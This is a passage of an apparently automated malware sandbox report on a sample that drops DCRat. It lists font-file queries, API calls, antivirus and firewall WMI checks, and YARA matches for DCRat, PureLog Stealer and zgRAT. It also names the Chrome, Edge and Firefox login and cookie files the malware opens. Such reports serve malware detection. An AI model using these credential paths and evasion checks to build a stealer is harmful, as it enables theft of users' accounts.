                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009A0970 CreateNamedPipeW,CreateFileW,3_2_009A0970
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004ADF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_004ADF1E
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0099F2B0 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,3_2_0099F2B0
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049B146 GetVersionExW,1_2_0049B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2938049506.000000001B820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: webDriverintoDll.exe PID: 7364, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KAdpNCgonFhCnlBRasdZerWl.exe PID: 8028, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
